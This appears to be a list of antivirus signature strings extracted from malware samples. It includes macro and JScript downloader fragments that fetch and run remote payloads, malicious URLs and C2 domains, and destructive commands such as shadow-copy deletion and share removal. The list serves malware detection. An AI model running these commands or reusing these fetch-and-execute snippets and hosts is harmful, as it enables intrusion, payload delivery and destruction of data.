- t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w" + ".j.mp/asdaksdjqwoddaskdajk (MACROHSTR_EXT)
- = " H" + D + D + L + "://" + K + T (MACROHSTR_EXT)
- GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B").EXEC pings (MACROHSTR_EXT)
- cdn.discordapp.com/attachments/ (PEHSTR_EXT)
- Khdjvwjdtqrymmqbudp.Zsnmdviewswsfojks (PEHSTR_EXT)
- Fzzyhjlxmatragttprvjqyx.Lnydjnlnrdgnolnao (PEHSTR_EXT)
- Reqwgdalckljtvgwjtjwexax.Aamtvsxqeb (PEHSTR_EXT)
- Toairbnwmoksarjexj.Vfiozsrttxhfjelvfpiwltx (PEHSTR_EXT)
- TweenEngineAPI.dll (PEHSTR_EXT)
- WeatherObserver.Properties.Resources.resource (PEHSTR_EXT)
- MediaCommands (PEHSTR_EXT)
- Computer (PEHSTR_EXT)
- Finance.Framework.Types.Properties (PEHSTR_EXT)
- EqualityComparer (PEHSTR_EXT)
- AmayaHotel.Resources (PEHSTR_EXT)
- AmayaSplashScreen (PEHSTR_EXT)
- GetCommandLineArgs (PEHSTR_EXT)
- SimpleGameLib.WordJumblePro.resources (PEHSTR_EXT)
- ndtia_Live_Server.FormLoader (PEHSTR_EXT)
- ndtia_Live_Server.My (PEHSTR_EXT)
- Text_Editer.Properties.Resources (PEHSTR_EXT)
- PhotoEditor.Properties.Resources (PEHSTR_EXT)
- TextEditer.Properties.Resources.resources (PEHSTR_EXT)
- FunkeySelector.Properties.Resources.resources (PEHSTR_EXT)
- FunnyTrader.Properties.Resources (PEHSTR_EXT)
- SyntecADUserEditor.Resources (PEHSTR_EXT)
- Bloc.My.Resources (PEHSTR_EXT)
- geir.My (PEHSTR_EXT)
- KeyedCollection.Inner.resources (PEHSTR_EXT)
- LOLLanguageSelector.UI.Properties.Resources (PEHSTR_EXT)
- ValueFixup.My.Resources (PEHSTR_EXT)
- mehrzady@gmail.com (PEHSTR_EXT)
- Devolepors@gmal.com (PEHSTR_EXT)
- mickey.Resources.resources (PEHSTR_EXT)
- VisorView.Properties.Resources (PEHSTR_EXT)
- RegisterVB.My.Resources (PEHSTR_EXT)
- William_Golding.My.Resources (PEHSTR_EXT)
- MentQ.Properties.Resources (PEHSTR_EXT)
- TitleEditor.TitleList.resources (PEHSTR_EXT)
- ITP_RMSS.Properties.Resources (PEHSTR_EXT)
- LoaderCodeSelector.Properties.Resources.resources (PEHSTR_EXT)
- DarkUI.Properties.Resources (PEHSTR_EXT)
- WpfApp1.My.Resources (PEHSTR_EXT)
- encrption.My.Resources (PEHSTR_EXT)
- ZenDirect.My.Resources (PEHSTR_EXT)
- PunismentSystemApp.Properties.Resources (PEHSTR_EXT)
- Ridgeway_Cover_Manager.Resources.resources (PEHSTR_EXT)
- BitConverter.My.Resources (PEHSTR_EXT)
- belongiar.Properties.Resources (PEHSTR_EXT)
- $safeprojectname$.Resources (PEHSTR_EXT)
- SKS.Resources.resources (PEHSTR_EXT)
- kredit_hp.My.Resources (PEHSTR_EXT)
- FormsClasses.Properties.Resources (PEHSTR_EXT)
- DskExplorer.My.Resources (PEHSTR_EXT)
- nTarlasi.Form1.resources (PEHSTR_EXT)
- ClockLogic.Main.resources (PEHSTR_EXT)
- MemberManagerLite.Resources.resources (PEHSTR_EXT)
- CasinoGame.Resources.resources (PEHSTR_EXT)
- DskExplorer.Etcher.resources (PEHSTR_EXT)
- execution_param (PEHSTR_EXT)
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\thedevilcoder.exe (PEHSTR_EXT)
- c:\Users\VICTOR\source\repos\DSGSGDSDSDLKJSDJK\DSGSGDSDSDLKJSDJK\obj\Debug\DSGSGDSDSDLKJSDJK.pdb (PEHSTR_EXT)
- https:##tepidness-tuesdays.000webhostapp.com#ta.exe (PEHSTR_EXT)
- WinFormServer.Properties.Resources.resources (PEHSTR_EXT)
- Coursework.About_Program.resources (PEHSTR_EXT)
- Coursework.frmGiris.resources (PEHSTR_EXT)
- http://myliverpoolnews.cf/liverpool-fc-news/features/ (PEHSTR_EXT)
- job.Properties.Resources (PEHSTR_EXT)
- Rocket_Mission.Properties.Resources (PEHSTR_EXT)
- DataTree.My.Resources (PEHSTR_EXT)
- InmacolProyecto.My.Resources (PEHSTR_EXT)
- Pomf_Uploader.My.Resources (PEHSTR_EXT)
- LeaveManager.Resources.resources (PEHSTR_EXT)
- Sklgeh.Properties.Resources.resources (PEHSTR_EXT)
- LevelEditor.Resources.resources (PEHSTR_EXT)
- Helpers.My.Resources (PEHSTR_EXT)
- S6X I\ (PEHSTR_EXT)
- Imager.PodajIloscKlasHistogramuG.resources (PEHSTR_EXT)
- PhotoSlideCS.Form1.resources (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.SplashForm.resources (PEHSTR_EXT)
- captainalm.Resources (PEHSTR_EXT)
- TrackManager.My.Resources (PEHSTR_EXT)
- webshellManager.aboutForm.resources (PEHSTR_EXT)
- Holiday.AboutBox.resources (PEHSTR_EXT)
- Holiday.AddSource.resources (PEHSTR_EXT)
- Picturesque.Editor.AboutForm.resources (PEHSTR_EXT)
- Picturesque.Editor.HelpForm.resources (PEHSTR_EXT)
- Picturesque.Editor.MDI.resources (PEHSTR_EXT)
- vssadmin.exe delete shadows /all /quiet (PEHSTR_EXT)
- .babyk (PEHSTR_EXT)
- BackupExecVSSProvider (PEHSTR_EXT)
- BackupExecAgentAccelerator (PEHSTR_EXT)
- BackupExecAgentBrowser (PEHSTR_EXT)
- BackupExecDiveciMediaService (PEHSTR_EXT)
- BackupExecJobEngine (PEHSTR_EXT)
- BackupExecManagementService (PEHSTR_EXT)
- BackupExecRPCService (PEHSTR_EXT)
- StudyTool.StudyTool.resources (PEHSTR_EXT)
- VideoLan.Plugin.Properties.Resources (PEHSTR_EXT)
- ReplacementFallback.Properties.Resources (PEHSTR_EXT)
- ASCIIArt.Form1.resources (PEHSTR_EXT)
- BigVid.Resources (PEHSTR_EXT)
- DS_ASS_2.My.Resources (PEHSTR_EXT)
- costura.classlibrary1.dll (PEHSTR_EXT)
- GameMaker.Resources.resources (PEHSTR_EXT)
- GameMaker.frmAddContact.resources (PEHSTR_EXT)
- Gamer_Clock.Resources.resources (PEHSTR_EXT)
- Gamer_Clock.iBaseTools.resources (PEHSTR_EXT)
- MouseManager.Resources.resources (PEHSTR_EXT)
- MouseManager.frmOptions.resources (PEHSTR_EXT)
- Emuloader.Resources.resources (PEHSTR_EXT)
- PEFileKinds.MCCCCC.resources (PEHSTR_EXT)
- PEFileKinds.Properties.Resources (PEHSTR_EXT)
- HttpListenerContext (PEHSTR_EXT)
- Multimedia.Midi.UI.Device (PEHSTR_EXT)
- ThemingSharper.Properties.Resources (PEHSTR_EXT)
- ThemingSharper.ForgotPassword.resources (PEHSTR_EXT)
- ThemingSharper.Payment.resources (PEHSTR_EXT)
- Reboot_IMG.Properties.Resources.resources (PEHSTR_EXT)
- ok.My.Resources (PEHSTR_EXT)
- TP2_Prog.Resources.resources (PEHSTR_EXT)
- stbc.MDIParent1.resources (PEHSTR_EXT)
- BattleShip (PEHSTR_EXT)
- AesCryptoServiceProvider (PEHSTR_EXT)
- DecompressGZip (PEHSTR_EXT)
- BO.My.Resources (PEHSTR_EXT)
- Almarafiw.Properties.Resources (PEHSTR_EXT)
- ClassAssignment.Properties.Resources (PEHSTR_EXT)
- ImageRecognition.Properties.Resources.resources (PEHSTR_EXT)
- Fluxx.Form1.resources (PEHSTR_EXT)
- Matrix_Graph.Properties.Resources (PEHSTR_EXT)
- Matrix_Graph.GraphForm (PEHSTR_EXT)
- data/Gauss.txt (PEHSTR_EXT)
- data/AlgoParam.txt (PEHSTR_EXT)
- HttpWebRequest (PEHSTR_EXT)
- WdKaclv.g.resources (PEHSTR_EXT)
- ReactionDiffusionLib.Properties.Resources.resources (PEHSTR_EXT)
- terminal.Resources.resources (PEHSTR_EXT)
- Streamship_Screenshot.Properties.Resources.resources (PEHSTR_EXT)
- CPE200Lab1.ExtendForm.resources (PEHSTR_EXT)
- ClownfishVoiceChanger.Properties.Resources.resources (PEHSTR_EXT)
- App__Beta_.Easy.resources (PEHSTR_EXT)
- SimpleUI.Form1 (PEHSTR_EXT)
- FileZillaProject.frmMain.resources (PEHSTR_EXT)
- FileZillaProject.frmDeckViewer.resources (PEHSTR_EXT)
- MetroFramework.Metro_Button (PEHSTR_EXT)
- MOHBAD.MOHBAD (PEHSTR_EXT)
- badbadmohh.txt (PEHSTR_EXT)
- HttpResponseMessage (PEHSTR_EXT)
- Serialization.Formatters.Binary (PEHSTR_EXT)
- Unable to resolve HTTP prox (PEHSTR_EXT)
- com.apple.Safari (PEHSTR_EXT)
- System.Threading.Tasks (PEHSTR_EXT)
- HttpServerUtility (PEHSTR_EXT)
- KeyValueStore/Master (PEHSTR_EXT)
- playerBindingSource.TrayLocation (PEHSTR_EXT)
- D:\Effffffffffffffffffffffffffxt.txt (PEHSTR_EXT)
- D:ughuExt.txt (PEHSTR_EXT)
- UseShellExecute (PEHSTR_EXT)
- Edfijki0joifffffffffxt.txt (PEHSTR_EXT)
- SoapHttpClientProtocol (PEHSTR_EXT)
- Tools.StronglyTypedResourceBuilder (PEHSTR_EXT)
- AnaSoftVerKSV.Resources.resources (PEHSTR_EXT)
- MultiplayerLib.Properties.Resources (PEHSTR_EXT)
- explosion.png (PEHSTR_EXT)
- skulls.png (PEHSTR_EXT)
- MultiplayerLib.Resource1.resources (PEHSTR_EXT)
- MultiplayerLib.ServerWindow.resources (PEHSTR_EXT)
- SmartFormat.SmartExtensions (PEHSTR_EXT)
- WindowsFormsApp1.Properties (PEHSTR_EXT)
- WinControls.ListView.ContainerColumnHeader.resources (PEHSTR_EXT)
- WinControls.ListView.Resources.resource (PEHSTR_EXT)
- Develop.My.Resources (PEHSTR_EXT)
- GradientPicker.X.resources (PEHSTR_EXT)
- POS_Sales_and_Inventory.My.Resources (PEHSTR_EXT)
- POS_Sales_and_Inventory.ISO.resources (PEHSTR_EXT)
- temp.txt (PEHSTR_EXT)
- WinControls.ListView.Resources.resources (PEHSTR_EXT)
- PassCrypt.My.Resources (PEHSTR_EXT)
- Kernel32.dll (PEHSTR_EXT)
- Agent.dll (PEHSTR_EXT)
- SimpleUI.MDI (PEHSTR_EXT)
- YTGet.My.Resources (PEHSTR_EXT)
- YTGet.ruleeditor.resources (PEHSTR_EXT)
- transfer.sh/get/GgD2LC/ (PEHSTR_EXT)
- transfer.sh/get/GkVJxj/ (PEHSTR_EXT)
- transfer.sh/get/8sD6To/ (PEHSTR_EXT)
- transfer.sh/get/qxvw7E/ (PEHSTR_EXT)
- transfer.sh/get/2s3yIi/ (PEHSTR_EXT)
- Viborita.My.Resources (PEHSTR_EXT)
- SuperAdventure.Properties.Resources (PEHSTR_EXT)
- PassCrypt.Resources.resources (PEHSTR_EXT)
- mPortal.My.Resources (PEHSTR_EXT)
- DTEDReader.Properties.Resources.resources (PEHSTR_EXT)
- Windows_Forms_Books.Form.resources (PEHSTR_EXT)
- discordhelper_module.My.Resources (PEHSTR_EXT)
- SACFE.My.Resources (PEHSTR_EXT)
- Winter_Sports_Rental.Resources (PEHSTR_EXT)
- RogueButtons.My.Resources (PEHSTR_EXT)
- TechSupportRegistration.My.Resources (PEHSTR_EXT)
- Windows_Forms_Books.CCCC.resources (PEHSTR_EXT)
- TaskManager.Resources.resources (PEHSTR_EXT)
- Mo.My.Resources (PEHSTR_EXT)
- http://185.246.220.65/lee/Chdcespbkah.jpeg (PEHSTR_EXT)
- Dnvegwwohj.Aupzikoxziowvfsknfbwizqw (PEHSTR_EXT)
- Church_Projector.My.Resources (PEHSTR_EXT)
- StarEggControl.My.Resources (PEHSTR_EXT)
- Shop_Manager.My.Resources (PEHSTR_EXT)
- Interface.Properties.Resources (PEHSTR_EXT)
- Jamils_Good_Old_Fun_Family_Center.My.Resources (PEHSTR_EXT)
- Car_Server.My.Resources (PEHSTR_EXT)
- ipaddress/api/admin/configuration/v1/conference/1/ (PEHSTR_EXT)
- .Newtonsoft.Json.dll (PEHSTR_EXT)
- www.google.com (PEHSTR_EXT)
- App1.Properties (PEHSTR_EXT)
- App1.Resources. (PEHSTR_EXT)
- ClassLibrary.dll (PEHSTR_EXT)
- ClassLibrary1.dll (PEHSTR_EXT)
- Newtonsoft.Json.dll (PEHSTR_EXT)
- Parsing.Cust (PEHSTR_EXT)
- mailto:luungoc2005@yahoo.com (PEHSTR_EXT)
- myapp.exe (PEHSTR_EXT)
- 9fSKkjS40ejTN5FSW0Lh+NUKhMRkCjed (PEHSTR_EXT)
- Garrix.Explorer1 (PEHSTR_EXT)
- Jeu_Echec\bin\Debug (PEHSTR_EXT)
- 9fSKkjS40ejTN5FSW0Lh+NUKhMRkCjed/2 (PEHSTR_EXT)
- KF7M4HCRbatV5DMGWjfSi (PEHSTR_EXT)
- IDM.IUelpmiS (PEHSTR_EXT)
- ElektroPictureBox.My.Resources (PEHSTR_EXT)
- Agent.Common.My.Resources (PEHSTR_EXT)
- HTML_Update_Checker.My.Resources (PEHSTR_EXT)
- SpaceInvaders.Properties.Resources (PEHSTR_EXT)
- SimpleUI.AB (PEHSTR_EXT)
- Streamship_Screenshot (PEHSTR_EXT)
- LiveSnoop_Agent (PEHSTR_EXT)
- RoyNES.Properties.Resources (PEHSTR_EXT)
- getEnumName = " https://1230948%1230948@bitly.com/ (MACROHSTR_EXT)
- bora. _ (MACROHSTR_EXT)
- myvalue. _ (MACROHSTR_EXT)
- nojarr.Rules (PEHSTR_EXT)
- Wcoeadcpse.Properties (PEHSTR_EXT)
- Rcwgu.Rules (PEHSTR_EXT)
- Atsrsf.Properties (PEHSTR_EXT)
- JpkgqbzMMP.Readers (PEHSTR_EXT)
- Fteuvrjk.Properties (PEHSTR_EXT)
- Cvrosme.Writers (PEHSTR_EXT)
- Akvacfkhhv.Properties (PEHSTR_EXT)
- System.Convert (PEHSTR_EXT)
- Kygo.dll (PEHSTR_EXT)
- CompressGZip (PEHSTR_EXT)
- DeserializeJson (PEHSTR_EXT)
- _2048.Properties.Resources (PEHSTR_EXT)
- BattleShip_WinFormsApp.MainForm.resources (PEHSTR_EXT)
- Dungeon_Sheehan.Form1.resources (PEHSTR_EXT)
- Nakliye.Anasayfa.resources (PEHSTR_EXT)
- "https://www.bitly.com/asiajia (MACROHSTR_EXT)
- "https://www.bitly.com/asahdjia (MACROHSTR_EXT)
- ShellExecute@ _ (MACROHSTR_EXT)
- ClassLibrary1.Polices.Pool (PEHSTR_EXT)
- IIIIIIIIIIIII.L.System.IO.DGIP (PEHSTR_EXT)
- ExecBytes (PEHSTR_EXT)
- RaceCore.dll (PEHSTR_EXT)
- Reload.com.InspectorMu.Web (PEHSTR_EXT)
- application/json; charset=utf-8 (PEHSTR_EXT)
- v2/process.php (PEHSTR_EXT)
- httpWebRequest (PEHSTR_EXT)
- costura.newtonsoft.json.dll.compressed (PEHSTR_EXT)
- Zoo has {0} animals. (PEHSTR_EXT)
- P_public + "shta " + StrReverse(".www//:ptth") + "bitly.com/asdhjwqdoqiwodma" (MACROHSTR_EXT)
- obj2.RestartCall obj.n_name (MACROHSTR_EXT)
- createobject(mic)setw0bnu7e=createobject(wne)dimdowasstringdow="downloaddata"u="http://topvaluationfirms.com/telexcopy.png"n="telexcopy.png"dimasyncasstringasync="downloadfileasync"gfx17loa.open (MACROHSTR_EXT)
- calc + """https://www.bitly.com/ (MACROHSTR_EXT)
- kaosdkqowkdok.SetStringValue polooood, kdkaskllll, (MACROHSTR_EXT)
- GetObject("winmgmts:\\" & mamammakdkd & "\root\default:StdRegProv") (MACROHSTR_EXT)
- /timeout/voip.aspx (PEHSTR_EXT)
- %.2d:%.2d %.2d-%\BaseNamedObject (PEHSTR_EXT)
- %APPDATA%\XProfiles (PEHSTR_EXT)
- Agent_VX_ (PEHSTR_EXT)
- cdn.nvbcloud.com (PEHSTR_EXT)
- Command (PEHSTR_EXT)
- nadjodo.duckdns.org (PEHSTR_EXT)
- AmigoSecretoWinForms.Form1.resources (PEHSTR_EXT)
- PexesoCore (PEHSTR_EXT)
- PexesoClass (PEHSTR_EXT)
- PexesoCore.dll (PEHSTR_EXT)
- HeavyDuck.Eve (PEHSTR_EXT)
- System.Security.Permissions (PEHSTR_EXT)
- HJSHJSLKW.pdb (PEHSTR_EXT)
- jfdawdawo.exe (PEHSTR_EXT)
- hnbzdfikeao.exe (PEHSTR_EXT)
- tf2modutil.Main.resources (PEHSTR_EXT)
- Main_Screen (PEHSTR_EXT)
- BaseChannel.My (PEHSTR_EXT)
- BaseChannel.Resources.resources (PEHSTR_EXT)
- apple.com (PEHSTR_EXT)
- mkjsefo3df (PEHSTR_EXT)
- TwitDuel.UI.Properties.Resources.resources (PEHSTR_EXT)
- Yedda.Twitter (PEHSTR_EXT)
- ClassLibrary1.Strategies.EventVisitorStrategy (PEHSTR_EXT)
- TrafficSimulation.Properties.Resources (PEHSTR_EXT)
- S0.EO (PEHSTR_EXT)
- DNB_client.exe (PEHSTR_EXT)
- igx64.exe (PEHSTR_EXT)
- crpt 2.0\crpt 2.0\bin\Debug\LT\liprus_prod\obj\Debug (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR)
- C:\Temp\ (PEHSTR_EXT)
- dav.bat (PEHSTR_EXT)
- ThreadPool.Light (PEHSTR_EXT)
- 9TVqQAAMAAAAEAAAA//8AAL (PEHSTR_EXT)
- Powered by SmartAssembly 8.0.2.4779 (PEHSTR_EXT)
- \stop-adw.txt (PEHSTR_EXT)
- 2.3.3.2 (PEHSTR_EXT)
- LzmwAqmV.exe (PEHSTR_EXT)
- Execute (PEHSTR_EXT)
- Jarokn Club (PEHSTR_EXT)
- C:\dnwaiodwandwaniodawnodwandawoangrdp\dwad.exe (PEHSTR_EXT)
- components (PEHSTR_EXT)
- CopyFromScreen (PEHSTR_EXT)
- StartAgentJob (PEHSTR_EXT)
- .&Hm-' (PEHSTR_EXT)
- .&Wm-' (PEHSTR_EXT)
- /&Cm-'RichBm- (PEHSTR_EXT)
- DOS mode. (PEHSTR_EXT)
- \command\start.exe (PEHSTR_EXT)
- sagoge.com (PEHSTR_EXT)
- macuwuf.com (PEHSTR_EXT)
- /get_load (PEHSTR_EXT)
- SplashScreen_Load (PEHSTR_EXT)
- \bemark2.dat (FILEPATH)
- \winnet.dll (FILEPATH)
- \rebboojh.dll (FILEPATH)
- SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\ntiotdll.exe (REGKEY)
- /gbot/t.php?q=%s (PEHSTR_EXT)
- /cgi-bin/cycle_report (PEHSTR_EXT)
- %s/gbot/sc.cgi?id=%s&c=%d (PEHSTR_EXT)
- stor.cfg (PEHSTR_EXT)
- User-Agent: gbot/ (PEHSTR_EXT)
- User-Agent: iamx/ (PEHSTR_EXT)
- images/im133.jpg (PEHSTR_EXT)
- images/3521.jpg (PEHSTR_EXT)
- /g/t.php?q=%s (PEHSTR_EXT)
- \gb_%d.bat (PEHSTR_EXT)
- \service.tmp (FILEPATH)
- check.223344556677.com (PEHSTR)
- o5nwy1giptdm-log.sdajk46546.com (PEHSTR)
- wireshark.exe (PEHSTR)
- www.systweak.com (PEHSTR)
- BotMainDll.dll (PEHSTR)
- fxsst.dll (PEHSTR)
- -System\CurrentControlSet\Services\%s\Security (PEHSTR)
- 5Registry\Machine\System\CurrentControlSet\Services\%s (PEHSTR)
- http://votnews.com/ecode/exit.php (PEHSTR_EXT)
- http://votnews.com/listnew3.txt (PEHSTR_EXT)
- =\svchost.exe (PEHSTR)
- drivers\ (PEHSTR)
- J\svchost.exe (PEHSTR)
- K\svchost.exe (PEHSTR)
- L\svchost.exe (PEHSTR)
- CSYSTEM\CurrentControlSet\Services\ (PEHSTR)
- SYSTEM\ControlSet001\Services\ (PEHSTR)
- %04d%02d%02d/%02d%02d%02d/%d.jsp (PEHSTR)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR)
- \svchost.exe -k (PEHSTR)
- \svchost.exe (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\drivers\ (PEHSTR_EXT)
- .sys (PEHSTR_EXT)
- .drv (PEHSTR_EXT)
- .pxy (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (PEHSTR_EXT)
- systemup.exe (PEHSTR_EXT)
- system16.exe (PEHSTR_EXT)
- vbfile.exe u (PEHSTR_EXT)
- iojik.ru/botzupd.html (PEHSTR_EXT)
- iojik.ru/in.php?ver=3.0a0005 (PEHSTR_EXT)
- iojik.ru/botzcfg.php?ver=3.0a0005 (PEHSTR_EXT)
- /alexa_count.asp?url= (PEHSTR_EXT)
- http://alexa.verynx.cn (PEHSTR_EXT)
- SOFTWARE\Alexa Internet (PEHSTR_EXT)
- \Msf3sf.sys (PEHSTR_EXT)
- .EXE (PEHSTR_EXT)
- C:\TEMP\\Group.wab (PEHSTR)
- net share admin$ /delete /y2 (PEHSTR_EXT)
- net share ipc$ /delete /y2 (PEHSTR_EXT)
- net share d$ /delete /y2 (PEHSTR_EXT)
- net share c$ /delete /y (PEHSTR_EXT)
- start /min cmd.exe /c (PEHSTR_EXT)
- 72.20.21.61 (PEHSTR_EXT)
- yahoo.co.jp (PEHSTR_EXT)
- www.nifty.com (PEHSTR_EXT)
- www.above.net (PEHSTR_EXT)
- www.level3.com (PEHSTR_EXT)
- www.stanford.edu (PEHSTR_EXT)
- 127.0.0.1 > nul (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\delme.bat (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\ggkb.bat (PEHSTR_EXT)
- software\microsoft\direct3d (PEHSTR)
- %s\drivers (PEHSTR)
- %s\svchost.exe (PEHSTR)
- BackDoor.SnowCrash (PEHSTR)
- Norton Av crack.exe (PEHSTR)
- DllFunctionCall (PEHSTR_EXT)
- Uninstalling bot... (PEHSTR_EXT)
- Morpheus.exe (PEHSTR_EXT)
- hidserv.exe (PEHSTR_EXT)
- msnupdate.exe (PEHSTR_EXT)
- SERVICES.EXE (PEHSTR_EXT)
- cyber@crime.gov (PEHSTR_EXT)
- svchost.exed (PEHSTR_EXT)
- ZONEALARM.EXE (PEHSTR_EXT)
- ZAUINST.EXE (PEHSTR_EXT)
- ZATUTOR.EXE (PEHSTR_EXT)
- WRCTRL.EXE (PEHSTR_EXT)
- dtr.dll (PEHSTR_EXT)
- hook.dll (PEHSTR_EXT)
- \CSCheat\Driver (PEHSTR_EXT)
- Software\Yahoo\pager (PEHSTR_EXT)
- System\wab32db.dll (PEHSTR_EXT)
- \\115.16.79.72\abcd$ (PEHSTR_EXT)
- %s\termfile.txt (PEHSTR_EXT)
- %s\disable.txt (PEHSTR_EXT)
- 1.bat (PEHSTR_EXT)
- 2.bat (PEHSTR_EXT)
- \NTboot.exe (PEHSTR_EXT)
- DarkShell\Release\DarkShell.pdb (PEHSTR_EXT)
- program files\Internet Explorer\IEXPLORE.EXE (PEHSTR_EXT)
- DarkShell.dll (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\%s\Parameters (PEHSTR_EXT)
- server.dll (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\Curd (PEHSTR_EXT)
- rentVersion\Svchost (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- COMSPEC (PEHSTR_EXT)
- \user32.dll (PEHSTR_EXT)
- \drivers\plxpci.sys (PEHSTR_EXT)
- \SystemRoot\system32\DRIVERS\plxpci.sys (PEHSTR_EXT)
- \asc3551.sys (PEHSTR_EXT)
- \wtime.exe (PEHSTR_EXT)
- \server.dll (PEHSTR_EXT)
- \plxpci.sys (PEHSTR_EXT)
- zlclient.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost (PEHSTR_EXT)
- Complete Download and run task (PEHSTR)
- $Clones\VISTA\vista\release\Vista.pdb (PEHSTR)
- iexplore.exe (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- winlogon.exe (PEHSTR_EXT)
- \SVCH0ST.EXE (PEHSTR_EXT)
- DLL (PEHSTR_EXT)
- \msvclapix.dll (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\SVCH0ST.EXE (PEHSTR_EXT)
- .htmGET (PEHSTR_EXT)
- .aspGET (PEHSTR_EXT)
- .htmlGET (PEHSTR_EXT)
- Referer: http://www.baidu.comd (PEHSTR_EXT)
- \update.bak (PEHSTR_EXT)
- \AutoRun.inf (PEHSTR_EXT)
- \system32\drivers\svchost.exed (PEHSTR_EXT)
- SOFTWARE\Microsoft\IEAgent (PEHSTR)
- SOFTWARE\systink (PEHSTR)
- privelegeupdates.info (PEHSTR)
- Registry-Grabbing.reg (PEHSTR_EXT)
- SOFTWARE\Borland\Delphi\RTLd (PEHSTR_EXT)
- http://www.game9988.cn/ (PEHSTR_EXT)
- cnt.exe (PEHSTR_EXT)
- ef26ev.dll (PEHSTR_EXT)
- \wininit.ini (PEHSTR_EXT)
- browsewmzero.dll (PEHSTR_EXT)
- \TrojanS_P.exed (PEHSTR)
- TROJAN VER 1.0 BUILD (PEHSTR)
- bensorty.dll (PEHSTR)
- http://yuoiop.info/rd/rd.php (PEHSTR)
- http://nanoatom.info/rd/rd.php (PEHSTR)
- F_Server.exe (PEHSTR)
- thua.3322.org (PEHSTR)
- -kill %s %s /installd (PEHSTR)
- !return escape(unescape(a.replace( (PEHSTR)
- %s\system\%s.exe (PEHSTR)
- +C:\Program Files\Common Files\System\%s.exe (PEHSTR)
- 195.8.15.138 (PEHSTR)
- 217.145.76.13 (PEHSTR)
- porn1. (PEHSTR)
- virgins. (PEHSTR)
- hotxxxtv. (PEHSTR)
- freelove. (PEHSTR)
- freepornnow. (PEHSTR)
- freeporntoday. (PEHSTR)
- del %s /a (PEHSTR)
- \ctfmon.exe (PEHSTR)
- \SERVICES.EXE (PEHSTR)
- '%ALLUSERSPROFILE%\Documents\microtm.bat (PEHSTR)
- cmd.exe /c copy %s %s (PEHSTR)
- cmd.exe /c copy \*.* (PEHSTR)
- regedit.exe /s /e %s (PEHSTR)
- MSVBVM60.DLL (PEHSTR)
- sin.bat (PEHSTR_EXT)
- cd C:\ (PEHSTR_EXT)
- myrat.dyndns.org (PEHSTR_EXT)
- Global\server (PEHSTR_EXT)
- Windows Update\update.exe (PEHSTR_EXT)
- pipe\_69 (PEHSTR_EXT)
- \temp.temp (PEHSTR_EXT)
- C:\Shadow.exe (PEHSTR_EXT)
- cmd.exe /c (PEHSTR_EXT)
- cmd killed (PEHSTR_EXT)
- cmd coming (PEHSTR_EXT)
- ESK_Server_Dll (PEHSTR_EXT)
- _Delete.dll (PEHSTR_EXT)
- Mang.xml (PEHSTR_EXT)
- s%4d%02d%02d%02d%02d%02d.jpg (PEHSTR_EXT)
- ddir c:\my documents (PEHSTR_EXT)
- undeldir%d.html (PEHSTR_EXT)
- sqlpass.dic (PEHSTR_EXT)
- Computer Numbers: %d (PEHSTR_EXT)
- ====welcome==== (PEHSTR_EXT)
- ROOT\SecurityCenter2 (PEHSTR_EXT)
- s%\pmeT\SWODNIW\:C (PEHSTR)
- \Startup\36OPG.com (PEHSTR)
- \Temp\hx107.tmp (PEHSTR)
- \Help\RUNDLL32.exe (PEHSTR)
- \360rp\ (PEHSTR)
- \360SelfProtection\ (PEHSTR)
- Rstray.exe (PEHSTR)
- http://www.531140.com/ (PEHSTR_EXT)
- \release.tmp (PEHSTR_EXT)
- cmd (PEHSTR_EXT)
- \System\ado\msador15 (PEHSTR_EXT)
- av0309\av0310\new jk2009\ (PEHSTR_EXT)
- system32.exe (PEHSTR_EXT)
- dll.dll (PEHSTR)
- \System32\TrkWcs.ex (PEHSTR)
- SOFTWARE\Microsoft\gh0st (PEHSTR_EXT)
- Comres.dll (PEHSTR_EXT)
- \System32\svchost.exe -k (PEHSTR_EXT)
- rename "%s" "%s.exe" (PEHSTR_EXT)
- \ctfmon.exe (PEHSTR_EXT)
- _svr.dat (PEHSTR_EXT)
- screen_link= (PEHSTR_EXT)
- screen= (PEHSTR_EXT)
- asssssssssddddd.dll (PEHSTR_EXT)
- #f.dll# (PEHSTR_EXT)
- #fsdf.dll# (PEHSTR_EXT)
- #fsdfsdf.dll# (PEHSTR_EXT)
- #r.dll# (PEHSTR_EXT)
- #s.dll# (PEHSTR_EXT)
- .UGx0 (SNID)
- gameoverlayui.exe (PEHSTR_EXT)
- #fsdfdsf.dll# (PEHSTR_EXT)
- #fsdfsd.dll# (PEHSTR_EXT)
- #ghfh.dll# (PEHSTR_EXT)
- #fsd.dll# (PEHSTR_EXT)
- Action List.ini (PEHSTR_EXT)
- people.xml (PEHSTR_EXT)
- people.csv (PEHSTR_EXT)
- System.Activator (PEHSTR_EXT)
- Session_Initialization.Properties.Resources (PEHSTR_EXT)
- ConferenceRegistration.My (PEHSTR_EXT)
- x='WinHttp'; (PEHSTR_EXT)
- x=new ActiveXObject(x+'.'+x+'Request.5.1'); (PEHSTR_EXT)
- x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1) (PEHSTR_EXT)
- x.send(); (PEHSTR_EXT)
- y='ipt.S'; (PEHSTR_EXT)
- new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2) (PEHSTR_EXT)
- https://ghghghfhfhfh.000webhostapp.com/RunPE.dll (PEHSTR_EXT)
- https://a.uguu.se/ (PEHSTR_EXT)
- http://ceylantreyler.com/Cms_Data/Sites/asd/Themes/Default/ (PEHSTR_EXT)
- tester.rasa (PEHSTR_EXT)
- vsdvsdvsdsdv.exe (PEHSTR_EXT)
